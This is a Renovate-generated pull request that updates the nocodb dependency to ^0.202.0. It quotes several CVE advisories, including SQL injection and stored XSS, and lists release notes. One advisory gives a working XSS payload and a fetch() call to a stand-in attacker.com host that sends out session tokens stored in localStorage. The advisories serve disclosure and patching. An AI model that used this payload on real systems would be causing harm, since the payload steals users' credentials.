Update dependency nocodb to ^0.202.0 [SECURITY] #145
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
^0.83.0->^0.202.0GitHub Vulnerability Alerts
CVE-2022-2079
Cross-site Scripting (XSS) - Stored in GitHub repository nocodb/nocodb prior to 0.91.9.
CVE-2022-2063
Improper Privilege Management in GitHub repository nocodb/nocodb prior to 0.91.8.
CVE-2022-2064
Insufficient Session Expiration in GitHub repository nocodb/nocodb prior to 0.91.9.
CVE-2022-3423
NocoDB prior to 0.92.0 allows actors to insert large characters into the input field
New Projecton the create field, which can cause a Denial of Service (DoS) via a crafted HTTP request. Version 0.92.0 fixes this issue.CVE-2022-2062
In NocoDB prior to 0.91.7, the SMTP plugin doesn't have verification or validation. This allows attackers to make requests to internal servers and read the contents.
CVE-2023-5104
Improper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.
CVE-2023-43794
Summary
Nocodb contains SQL injection vulnerability, that allows an authenticated attacker with creator access to query the underlying database.
Product
nocodb/nocodb
Tested Version
0.109.2
Details
SQL injection in
SqliteClient.ts(GHSL-2023-141)By supplying a specially crafted payload to the given below parameter and endpoint, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database.
The
triggerListmethod creates a SQL query using the user-controlledtable_nameparameter value from thetableCreateendpoint.Impact
This issue may lead to
Information Disclosure.Credit
This issue was discovered and reported by GHSL team member @sylwia-budzynska (Sylwia Budzynska).
Disclosure Policy
This report is subject to our coordinated disclosure policy.
CVE-2023-50718
Summary
An authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped table_name.
Details
SQL Injection vulnerability occurs in VitessClient.ts.
The variable ${args.tn} refers to the table name entered by the user.
A malicious attacker can escape the existing query by including a special character (') in the table name and insert and execute a new arbitrary SQL query.
Impact
This vulnerability may result in leakage of sensitive data in the database.
CVE-2023-49781
Summary
A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.
Details
The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.
PoC
Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T}
Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)
Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims
Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage
The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.
Impact
Stealing the credentials of NocoDB user that clicks the malicious link.
Release Notes
nocodb/nocodb (nocodb)
v0.202.10: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
What's Changed
🐛 Closed Issues
NocoDB Cloud Available#69700108002to0111002failed", Relation aready exists #6826Rollupsumfordurationfield,the data display should also beduration, but it shows the number of seconds. #6778New Contributors
Full Changelog: nocodb/nocodb@0.202.9...0.202.10
v0.202.9: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
save changeson closing expanded record #7066Lookup > Child fieldneeds fix #6989IDnot ignored if sent in API payload #5871What's Changed
New Contributors
Full Changelog: nocodb/nocodb@0.202.8...0.202.9
v0.202.8: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
What's Changed
New Contributors
Full Changelog: nocodb/nocodb@0.202.7...0.202.8
v0.202.7: : Hotfix ReleaseCompare Source
🚀 NocoDB : Hotfix Release
What's Changed
Full Changelog: nocodb/nocodb@0.202.6...0.202.7
v0.202.6: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
Linked recordsmodal from form view is stuck with skeleton loader #6844Team & Settingsnot accessible for Org Creator #6784Invalid Date#6683Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.